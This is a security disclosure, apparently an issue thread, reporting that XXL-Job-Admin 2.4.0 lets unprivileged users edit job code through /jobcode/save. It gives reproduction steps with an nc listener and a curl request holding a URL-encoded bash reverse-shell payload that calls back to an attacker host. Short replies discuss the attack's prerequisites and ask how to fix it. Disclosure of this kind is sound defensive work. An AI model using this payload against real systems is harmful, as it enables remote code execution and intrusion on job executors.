Environment
MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)
Vulnerability Information
It was found that the /xxl-job-admin/jobcode/save does not validate user privilege. The modification of code in running cronjob for job executor does not require privileged user access. By leveraging the vulnerability, users could craft HTTP requests to modify and run arbitrary code (e.g., sensitive information disclosure OR reverse shell) on the job executor.
Steps to reproduce the behavior
Step 1: Create a listenernc -nlvp 8888
Step 2: Create a unprivileged user and get its cookie
Step 3: Craft an HTTP request for job code saving. This demonstration will be a reverse shell payload.curl http://<IP Address>:<Port>/xxl-job-admin/jobcode/save --cookie "xxljob_adminlte_settings=on; XXL_JOB_LOGIN_IDENTITY=<Unprivileged Cookie>" -d "id=2&glueSource=%23%2Fbin%2Fbash%0Abash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<Reverse shell IP>%2F<Reverse shell port>%200%3E%261&glueRemark=Test"
Step 4. Trigger the cronjob/wait until cronjob executes. A reverse shell will be executed.
4条答案
按热度按时间68de4m5k1#
Create an unprivileged user and get its cookie, which I don't think is easy for attackers.
abithluo2#
Agree. The assumption of the attack is that you gained an unprivileged account.
cuxqih213#
所以这个漏洞该怎么修复呢
oogrdqng4#
同问,这个漏洞该如何修复呢。